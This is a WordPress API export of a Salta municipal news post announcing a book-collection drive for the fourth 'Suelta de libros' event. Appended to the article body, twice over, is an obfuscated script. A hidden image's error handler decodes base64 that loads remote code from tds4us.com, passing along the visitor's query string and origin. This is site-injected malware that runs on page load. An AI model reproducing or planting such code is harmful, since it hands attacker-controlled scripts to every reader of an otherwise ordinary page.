{"id":4942,"date":"2025-03-13T11:16:23","date_gmt":"2025-03-13T14:16:23","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4942"},"modified":"2025-08-13T23:38:53","modified_gmt":"2025-08-14T02:38:53","slug":"inicio-la-colecta-de-libros-para-la-proxima-suelta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4942","title":{"rendered":"Inici\u00f3 la colecta de libros para la pr\u00f3xima Suelta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-1459415b4184cd2ba6ad7dcf93c083f9\" style=\"background-color:#095988\"><strong><em>Ser\u00e1 la 4ta edici\u00f3n y se llevar\u00e1 a cabo el jueves 24 de abril en el complejo Nicol\u00e1s Vitale. Los que deseen donar pueden hacerlo en las oficinas de Espacios P\u00fablicos, ubicadas en Alvarado 735 o solicitar informaci\u00f3n al 3874411953.<\/em><\/strong><\/h4>\n\n\n\n<p>Se viene la 4ta edici\u00f3n de la Suelta de libros, y la Municipalidad ya puso fecha, tendr\u00e1 lugar el jueves 24 de abril en el complejo Nicol\u00e1s Vitale, de zona sur. Adem\u00e1s, informaron que quienes lo deseen ya pueden acercar sus donaciones de ejemplares.&nbsp;<\/p>\n\n\n\n<p>Como en ediciones pasadas, los que asistan podr\u00e1n llevarse hasta tres libros por persona.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"4943\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/segunda-suelta-de-libros3-jpeg-1024x576.avif\" alt=\"\" class=\"wp-image-4943\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4944\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/segunda-suelta-de-libros4-jpeg-1024x576.avif\" alt=\"\" class=\"wp-image-4944\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/segunda-suelta-de-libros4-jpeg-1024x576.avif 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/segunda-suelta-de-libros4-jpeg-300x169.avif 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/segunda-suelta-de-libros4-jpeg-768x432.avif 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/segunda-suelta-de-libros4-jpeg-747x420.avif 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/segunda-suelta-de-libros4-jpeg-696x392.avif 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/segunda-suelta-de-libros4-jpeg-1068x601.avif 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/segunda-suelta-de-libros4-jpeg.avif 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"4945\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/suelta-de-libros-unsa-3ra-edicion-3-jpeg-1024x682.avif\" alt=\"\" class=\"wp-image-4945\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/suelta-de-libros-unsa-3ra-edicion-3-jpeg-1024x682.avif 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/suelta-de-libros-unsa-3ra-edicion-3-jpeg-300x200.avif 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/suelta-de-libros-unsa-3ra-edicion-3-jpeg-768x512.avif 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/suelta-de-libros-unsa-3ra-edicion-3-jpeg-1536x1023.avif 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/suelta-de-libros-unsa-3ra-edicion-3-jpeg-630x420.avif 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/suelta-de-libros-unsa-3ra-edicion-3-jpeg-696x464.avif 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/suelta-de-libros-unsa-3ra-edicion-3-jpeg-1068x712.avif 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/03\/suelta-de-libros-unsa-3ra-edicion-3-jpeg.avif 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u201cEmpezamos con la colecta a falta de m\u00e1s de un mes para la Suelta. Habr\u00e1 libros de todo tipo para que los que asistan puedan disfrutar de los mismos. Se podr\u00e1n realizar donaciones hasta el 24 de abril, d\u00eda del evento\u201d, dijo Lourdes Rold\u00e1n, subsecretaria de Paseos de Compras.&nbsp;<\/p>\n\n\n\n<p>Los que deseen donar sus libros pueden acercarlos a las oficinas de la Subsecretar\u00eda de Espacios P\u00fablicos, ubicadas en Alvarado 735 o comunicarse al 3874411953 para solicitar informaci\u00f3n.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Inici\u00f3 la colecta de libros para la pr\u00f3xima Suelta\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/hPFhdn6czNc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/inicio-la-colecta-de-libros-para-la-proxima-suelta\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/saltaciudad.travel\/wp-content\/uploads\/LOGO-SaltaMuni-350px-513.png\" alt=\"\" style=\"width:194px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 la 4ta edici\u00f3n y se llevar\u00e1 a cabo el jueves 24 de abril en el complejo Nicol\u00e1s Vitale. Los que deseen donar pueden hacerlo en las oficinas de Espacios P\u00fablicos, ubicadas en Alvarado 735 o solicitar informaci\u00f3n al 3874411953. Se viene la 4ta edici\u00f3n de la Suelta de libros, y la Municipalidad ya puso [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4946,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4942","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4942"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4942"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4942\/revisions"}],"predecessor-version":[{"id":6550,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4942\/revisions\/6550"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4946"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4942"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4942"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4942"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}